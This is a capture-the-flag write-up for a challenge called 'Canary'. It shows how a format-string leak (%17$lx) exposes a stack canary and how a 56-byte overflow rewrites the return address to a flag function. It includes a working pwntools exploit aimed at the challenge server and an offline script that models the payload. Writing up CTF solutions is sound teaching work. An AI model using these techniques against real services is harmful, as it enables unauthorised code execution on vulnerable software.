# Canary

Use pattern.py to flood the second input and set a breakpoint in `greet` at the instruction that compares the canaries. Read `rax` in gdb and feed it back into pattern.py: the canary sits 56 bytes into the buffer. For the first input, try format strings (`%N$lx` for increasing N) until you find an offset whose output is always 8 bytes (16 hex digits) long; that is the canary (on glibc x86-64 its low byte is always `00`, so the leaked value ends in `00`). Then write a script that leaks the canary and overflows the buffer with `56 junk bytes + canary + 8 junk bytes + flag address`.

## Note: the canary sits just below the saved rbp, which is why 8 junk bytes are needed to fill the saved rbp slot before the return address

```python
from pwn import *
import re

e = ELF("./canary")
p = remote("shell.actf.co", 20701)

# Skip the banner and the first prompt
for _ in range(23):
    p.recvline()
p.recvline()

# First input: print the 17th stack argument as a 64-bit hex word.
# Offset 17 is the one whose output was always 8 bytes wide.
p.sendline(b"%17$lx")
flagaddr = 0x0000000000400787  # address of the flag function

output = p.recvline()
num = re.findall(rb"Nice to meet you, (.*)!", output)
canary = int(num[0], 16)
log.info("Canary: " + hex(canary))

# Second input: overflow the buffer while keeping the canary intact
firstpad = 'A' * 56                 # junk before the canary
firstpad = firstpad.encode()
canaryString = p64(canary)          # leaked canary, written back in place
neweip = p64(flagaddr)              # new return address -> flag function
lastpad = 'B' * 8                   # fills the saved rbp slot
lastpad = lastpad.encode()
payload = firstpad + canaryString + lastpad + neweip
p.sendline(payload)
log.info("Response: " + p.recvline().decode(errors="replace"))
```
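As an added example that is not part of the original writeup, the following Python script models the two steps offline: picking the `%N$lx` offset that leaks the canary, and checking that the `56 junk bytes + canary + 8 junk bytes + flag address` payload survives the canary comparison. The leaked hex strings, the greeting line and the toy `simulate_greet` frame (including its saved rbp and original return address) are constructed here; only the 56-byte offset, the greeting format and the flag address `0x400787` come from the writeup.

```python
import re
import struct

# Stack layout of greet() as described in the writeup (x86-64, 8-byte slots):
#   [56 bytes: buffer + padding][canary][saved rbp][return address]
BUF_TO_CANARY = 56
WORD = 8
FLAG_ADDR = 0x400787  # address of the flag function, from the writeup

LEAK_RE = re.compile(rb"Nice to meet you, ([0-9a-fA-F]+)!")


def pick_canary_offset(samples):
    """samples maps a %N$lx offset to the hex strings it printed on several runs.
    Return the offset that behaves like the canary: always a full 8-byte word
    (16 hex digits; user-space pointers have their top two bytes zero and print
    12 digits at most), different on every run (re-randomised per process) and
    with a zero low byte (glibc clears it so string functions stop there)."""
    for offset, leaks in sorted(samples.items()):
        values = [int(h, 16) for h in leaks]
        if (all(len(h) == 16 for h in leaks)
                and len(set(values)) == len(values)
                and all(v & 0xFF == 0 for v in values)):
            return offset
    return None


def parse_canary_leak(line):
    """Extract the canary from the greeting line printed after sending '%N$lx'."""
    m = LEAK_RE.search(line)
    if m is None:
        raise ValueError("no leaked word in %r" % line)
    value = int(m.group(1), 16)
    if value & 0xFF:
        raise ValueError("0x%x has a non-zero low byte, wrong offset?" % value)
    return value


def build_payload(canary, ret_addr):
    """56 junk bytes + canary + 8 junk bytes (saved rbp) + new return address."""
    return (b"A" * BUF_TO_CANARY
            + struct.pack("<Q", canary)
            + b"B" * WORD
            + struct.pack("<Q", ret_addr))


def simulate_greet(payload, canary, saved_rbp=0x7FFD1234ABC0, ret_addr=0x4007B0):
    """Toy model of the vulnerable frame, not the real binary: copy the payload
    into the frame with no bounds check (as gets() would), run the canary
    comparison, and return the address greet() would return to, or None if
    the comparison fails and __stack_chk_fail would abort the process."""
    frame = bytearray(
        b"\0" * BUF_TO_CANARY
        + struct.pack("<Q", canary)          # constructed canary slot
        + struct.pack("<Q", saved_rbp)       # constructed saved rbp
        + struct.pack("<Q", ret_addr)        # constructed original return address
    )
    n = min(len(payload), len(frame))
    frame[:n] = payload[:n]  # the overflow
    if bytes(frame[BUF_TO_CANARY:BUF_TO_CANARY + WORD]) != struct.pack("<Q", canary):
        return None  # *** stack smashing detected ***
    return struct.unpack("<Q", bytes(frame[-WORD:]))[0]


if __name__ == "__main__":
    # Constructed leaks from three hypothetical offsets over two runs
    samples = {
        15: ["7ffd2c1a3e40", "7ffe0b9d5120"],          # a stack pointer
        16: ["1", "1"],                                # a small constant
        17: ["5a3c1f0e9d7b2100", "e81d00f3a6c45900"],  # the canary
    }
    offset = pick_canary_offset(samples)
    # Constructed greeting line, as the server would print it for "%17$lx"
    canary = parse_canary_leak(b"Nice to meet you, 5a3c1f0e9d7b2100!\n")
    payload = build_payload(canary, FLAG_ADDR)
    print("offset %%%d$lx, canary 0x%x, payload %d bytes" % (offset, canary, len(payload)))
    print("return address with correct canary: 0x%x" % simulate_greet(payload, canary))
    print("return address with clobbered canary:", simulate_greet(b"A" * 80, canary))
```

The `simulate_greet` model is only there to show why the leaked canary has to go back at byte 56 and why the 8 filler bytes for the saved rbp are needed before the return address; against the real service the payload goes to the second input exactly as in the script above.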
